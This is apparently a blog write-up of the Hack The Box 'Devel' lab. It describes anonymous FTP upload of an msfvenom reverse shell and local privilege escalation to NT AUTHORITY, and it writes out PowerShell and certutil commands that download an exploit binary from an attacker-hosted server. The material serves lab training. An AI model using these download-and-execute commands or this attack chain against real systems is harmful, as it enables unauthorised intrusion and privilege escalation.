Skip to content

Hack the box – Devel without Metasploit

I’m skipping Blue since its the same as Legacy and moving to Devel.

For exploitation used the following.

  1. nmap
  2. msfvenom
  3. SimpleHTTPServer

From the nmap scan found out that anonymous login is enabled for FTP

when logged in found out that anonymous user has the rights to push files to the webserver. Created a reverse shell using msfvenom and uploaded it

from the browser went to the usl with netcat listening. Got a low level windows shell. from systeminfo found out that it was vulnerable build.

searched for the exploit on google, found one. Searched through searchsploit to find the same one

compiled the exploit using i686-w64-mingw32-gcc as instructed. if you don’t have it installed. You can install it by typing apt install mingw-w64

after compiling the exploit use SimpleHTTPServer for hosting the exploit, which can be downloaded to the windows box.

There are two ways to download this file to the windows box using command line

  1. Using Powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.22/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"

2. Using Certutil

certutil.exe -urlcache -split -f http://10.10.14.22/exploit.exe exploitee.exe

after downloading the exploit run it in the command line. we have NT AUTHORITY.

Published inHackinghacktheboxOSCP

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *